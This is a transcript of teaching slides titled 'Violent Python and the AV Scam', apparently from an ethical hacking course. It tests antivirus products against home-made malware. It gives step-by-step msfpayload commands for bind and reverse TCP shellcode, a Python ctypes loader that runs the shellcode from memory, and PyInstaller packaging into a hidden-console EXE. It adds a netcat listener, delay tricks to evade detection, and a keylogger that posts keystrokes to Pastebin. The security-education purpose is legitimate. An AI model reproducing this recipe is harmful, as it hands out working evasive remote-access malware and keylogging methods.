Violent Python
-
Upload
holarmidaybhadaytunji -
Category
Documents
-
view
11 -
download
0
description
Transcript of Violent Python
Violent Python and the AV Scam
Violent PythonBio
CNIT 124Advanced Ethical Hacking
Violent PythonGood coding principlesException handlingModular designOptimizationCommentingFlow chartsFORGET THEM ALLViolent PythonWe are hackersWe are here to BREAK STUFFIt should be fast and easy for a complete novice to hack together a simple script to do something fun!
Projects
Antivirus
Ungh! Good God y'all...
What is it GOOD For?
Mikko Hypponen Video
Metasploit PayloadsMetasploitHundreds of payloadsThe simplest one: bind_tcpListens on a TCP port for commands
Simple Reverse ShellOne command to produce very simple Windows EXE malware
Antivirus Catches It
Norton v. Shell.exe
Norton Identifies the Metasploit Packer
VirusTotal: 37/49 Detections
How to Become 007
Python v. AVRound 1shell_bind_tcpExport Metasploit Payloads to C
Use Ctypes Python Library
Compile it on WindowsInstall these things, in orderPython 2.7PyWin32pip-WinPyInstallerThis creates an EXE file that listens on a TCP port
DEMOOn Kalimsfpayload windows/shell_bind_tcp C > foonano fooChange top tofrom ctypes import *shellcode = (Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()DEMOOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile --noconsole fooVirusTotal: 1/50 Detection
Norton SupportI Tweeted about this, and @NortonSupport repliedVirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning@NortonSupport gave me a link for a 30-day trial version :)Norton Wins!
Kaspersky Wins!Avast! doesn't detect itKaspersky detects it as HEUR:Trojan.Win32.Generic
Python v. AVRound 2shell_bind_tcpwith a delay
DEMOOn Kalicp foo foo2nano foo2x=raw_input("Press Enter to continue")On Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile foo2Norton, Avast, & MSE Lose!
Kaspersky Wins!
Python v. AVRound 3shell_bind_tcpin two stagesno delayOther AVTested on Mar 24, 2014 with a two-stage reverse shell and no time delayAl these failedNortonNod32Avast!360 Internet SecurityMcAfeeKasperskyRemember Mikko?
F-Secure Wins!
AV ChallengePosted April 3, 2014No reply from AV vendors, but Norton improved its detection after thatNow a delay is required
Python v. AVRound 4shell_bind_tcpwith a delayINSTRUCTIONSOn Kalimsfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > revnano revChange top tox=raw_input("Press Enter to continue")from ctypes import *shellcode = (Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()INSTRUCTIONSOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile revOn Kalinc lp 4444
Norton Loses
Kaspersky Wins
Advanced Malware Protectionty @ChrisAbdalla_1 from HP ESP TippingPoint
A friend in the financial industry tested Evil.exe on a system protected by FireEyeFireEye gives no alerts and lets it post keystrokes right to Pastebin
Python KeyloggerGoogle "Python Keylogger"I used this one from 4 years ago
Post Keystrokes to Pastebin
ProblemPastebin busted me for making too many pastes in a 24-hour periodSo I wrote my own Pastebin imitationKaspersky & Avast! LOSE
Norton WINS!
But just add a delay...
F-Secure LOSES!
PRODUCT ANNOUNCEMENT!Ultra-Advanced APT Toolsamsclass.info/evil.exe
UNSTOPPABLENone of these products stop itNortonMcAfeeKasperskyNod32F-SecureAvast!Microsoft Security Essentials